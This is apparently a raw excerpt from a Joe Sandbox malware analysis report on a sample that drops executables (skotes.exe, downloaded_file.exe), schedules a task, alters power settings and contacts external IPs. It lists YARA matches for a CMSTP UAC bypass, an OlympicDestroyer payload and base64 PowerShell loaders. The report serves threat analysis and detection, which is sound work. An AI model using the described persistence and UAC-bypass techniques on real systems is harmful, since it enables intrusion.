Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:50045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50096 version: TLS 1.2

Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Window created: window name: CLIPBRDWNDCLASS

Source: explorer.exe, 00000027.00000002.2965270172.00000000042F0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ENCMARK RegisterRawInputDevices

memstr_f4a3bdc3-8

System Summary

Malicious sample detected (through community Yara rule)

Source: 28.2.powershell.exe.60b0328.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.powershell.exe.60324f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.2.downloaded_file.exe.11fffa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.2.downloaded_file.exe.11fffa0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 39.2.explorer.exe.2dd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.0.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.2.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.powershell.exe.60324f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.powershell.exe.60b0328.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 41.2.explorer.exe.28a0000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: Process Memory Space: powershell.exe PID: 3284, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

.NET source code contains very large strings

Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, s67.cs

Long String: Length: 606824

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name:
Source: DBFIEHDHII.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: .idata
Source: random[1].exe.12.dr	Static PE information: section name:
Source: 60c1233683.exe.12.dr	Static PE information: section name:
Source: 60c1233683.exe.12.dr	Static PE information: section name: .idata
Source: 60c1233683.exe.12.dr	Static PE information: section name:
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name:
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name: .idata
Source: 50c9f14fb7.exe.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name: .idata

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

Jump to dropped file

Uses powercfg.exe to modify the power settings

Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

0_2_6C6B62C0

Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe

File created: C:\Users\user\AppData\Local\Temp\jbrdiqcrtdja.sys

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp			Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53AC60	0_2_6C53AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60AC30	0_2_6C60AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6C00	0_2_6C5F6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58ECD0	0_2_6C58ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C52ECC0	0_2_6C52ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FED70	0_2_6C5FED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65AD50	0_2_6C65AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B8D20	0_2_6C6B8D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BCDC0	0_2_6C6BCDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6D90	0_2_6C5C6D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C534DB0	0_2_6C534DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CEE70	0_2_6C5CEE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C610E20	0_2_6C610E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53AEC0	0_2_6C53AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D0EC0	0_2_6C5D0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B6E90	0_2_6C5B6E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59EF40	0_2_6C59EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F2F70	0_2_6C5F2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C536F10	0_2_6C536F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670F20	0_2_6C670F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60EFF0	0_2_6C60EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C530FE0	0_2_6C530FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678FB0	0_2_6C678FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53EFB0	0_2_6C53EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C604840	0_2_6C604840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C580820	0_2_6C580820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BA820	0_2_6C5BA820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6368E0	0_2_6C6368E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C568960	0_2_6C568960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C586900	0_2_6C586900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C9E0	0_2_6C64C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5649F0	0_2_6C5649F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F09B0	0_2_6C5F09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C09A0	0_2_6C5C09A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EA9A0	0_2_6C5EA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ACA70	0_2_6C5ACA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DEA00	0_2_6C5DEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E8A30	0_2_6C5E8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AEA80	0_2_6C5AEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C636BE0	0_2_6C636BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D0BA0	0_2_6C5D0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C548460	0_2_6C548460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BA430	0_2_6C5BA430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C594420	0_2_6C594420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5764D0	0_2_6C5764D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CA4D0	0_2_6C5CA4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65A480	0_2_6C65A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C588540	0_2_6C588540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C634540	0_2_6C634540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D0570	0_2_6C5D0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678550	0_2_6C678550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C592560	0_2_6C592560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BE5F0	0_2_6C5BE5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FA5E0	0_2_6C5FA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5245B0	0_2_6C5245B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58C650	0_2_6C58C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5546D0	0_2_6C5546D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58E6E0	0_2_6C58E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CE6E0	0_2_6C5CE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B0700	0_2_6C5B0700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C55A7D0	0_2_6C55A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C57E070	0_2_6C57E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F8010	0_2_6C5F8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FC000	0_2_6C5FC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C528090	0_2_6C528090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60C0B0	0_2_6C60C0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5400B0	0_2_6C5400B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C598140	0_2_6C598140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C614130	0_2_6C614130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A6130	0_2_6C5A6130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5301E0	0_2_6C5301E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C8250	0_2_6C5C8250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B8260	0_2_6C5B8260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C608220	0_2_6C608220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FA210	0_2_6C5FA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B62C0	0_2_6C6B62C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6022A0	0_2_6C6022A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FE2B0	0_2_6C5FE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C360	0_2_6C64C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C538340	0_2_6C538340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C672370	0_2_6C672370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C532370	0_2_6C532370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6370	0_2_6C5C6370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A2320	0_2_6C5A2320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5843E0	0_2_6C5843E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58E3B0	0_2_6C58E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5623A0	0_2_6C5623A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C533C40	0_2_6C533C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C659C40	0_2_6C659C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C541C30	0_2_6C541C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66DCD0	0_2_6C66DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F1CE0	0_2_6C5F1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CFC80	0_2_6C5CFC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C593D00	0_2_6C593D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C601DC0	0_2_6C601DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C523D80	0_2_6C523D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679D90	0_2_6C679D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B5E60	0_2_6C6B5E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68BE70	0_2_6C68BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63DE10	0_2_6C63DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C553EC0	0_2_6C553EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687F20	0_2_6C687F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C525F30	0_2_6C525F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C565F20	0_2_6C565F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64DFC0	0_2_6C64DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B3FC0	0_2_6C6B3FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DBFF0	0_2_6C5DBFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C551F90	0_2_6C551F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C603840	0_2_6C603840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58D810	0_2_6C58D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60F8F0	0_2_6C60F8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B8F0	0_2_6C68B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CF8C0	0_2_6C5CF8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53D8E0	0_2_6C53D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5638E0	0_2_6C5638E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AF960	0_2_6C5AF960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ED960	0_2_6C5ED960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F900	0_2_6C67F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E5920	0_2_6C5E5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5699D0	0_2_6C5699D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C99C0	0_2_6C5C99C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5959F0	0_2_6C5959F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C79F0	0_2_6C5C79F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C541980	0_2_6C541980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C601990	0_2_6C601990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9A50	0_2_6C6B9A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C56FA10	0_2_6C56FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D1A10	0_2_6C5D1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62DA30	0_2_6C62DA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C531AE0	0_2_6C531AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60DAB0	0_2_6C60DAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60FB60	0_2_6C60FB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C57BB20	0_2_6C57BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C577BF0	0_2_6C577BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C521B80	0_2_6C521B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F9BB0	0_2_6C5F9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C615B90	0_2_6C615B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C589BA0	0_2_6C589BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BD410	0_2_6C5BD410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C619430	0_2_6C619430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5314E0	0_2_6C5314E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B14A0	0_2_6C6B14A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C545510	0_2_6C545510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C597500	0_2_6C597500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F510	0_2_6C67F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B55F0	0_2_6C5B55F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C569590	0_2_6C569590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C549650	0_2_6C549650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C585640	0_2_6C585640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A7610	0_2_6C5A7610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C559600	0_2_6C559600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5616A0	0_2_6C5616A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5996A0	0_2_6C5996A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C609720	0_2_6C609720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59D710	0_2_6C59D710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C553720	0_2_6C553720
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D878BB	9_2_00D878BB
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D87049	9_2_00D87049
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D88860	9_2_00D88860
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D831A8	9_2_00D831A8
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00E58101	9_2_00E58101
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D44B30	9_2_00D44B30
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D44DE0	9_2_00D44DE0
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D82D10	9_2_00D82D10
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D8779B	9_2_00D8779B
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: 9_2_00D77F36	9_2_00D77F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E178BB	10_2_00E178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E18860	10_2_00E18860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E17049	10_2_00E17049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E131A8	10_2_00E131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00DD4B30	10_2_00DD4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00DD4DE0	10_2_00DD4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E12D10	10_2_00E12D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E1779B	10_2_00E1779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00E07F36	10_2_00E07F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E178BB	11_2_00E178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E18860	11_2_00E18860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E17049	11_2_00E17049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E131A8	11_2_00E131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00DD4B30	11_2_00DD4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00DD4DE0	11_2_00DD4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E12D10	11_2_00E12D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E1779B	11_2_00E1779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00E07F36	11_2_00E07F36

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6BDAE0 appears 83 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C559B10 appears 109 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6B09D0 appears 339 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C553620 appears 96 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6BD930 appears 65 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C58C5E0 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C669F30 appears 53 times
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Code function: String function: 00D580C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00DE80C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00DEDF80 appears 36 times

Source: ntRoEwh[1].exe.12.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 2186327 bytes, 1 file, at 0x2c +A "callmobile.exe", ID 1412, number 1, 76 datablocks, 0x1503 compression
Source: ntRoEwh.exe.12.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 2186327 bytes, 1 file, at 0x2c +A "callmobile.exe", ID 1412, number 1, 76 datablocks, 0x1503 compression

Source: file.exe, 00000000.00000002.2126583225.000000006F902000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2121699779.000000000BFAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 28.2.powershell.exe.60b0328.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.powershell.exe.60324f8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 36.2.downloaded_file.exe.11fffa0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
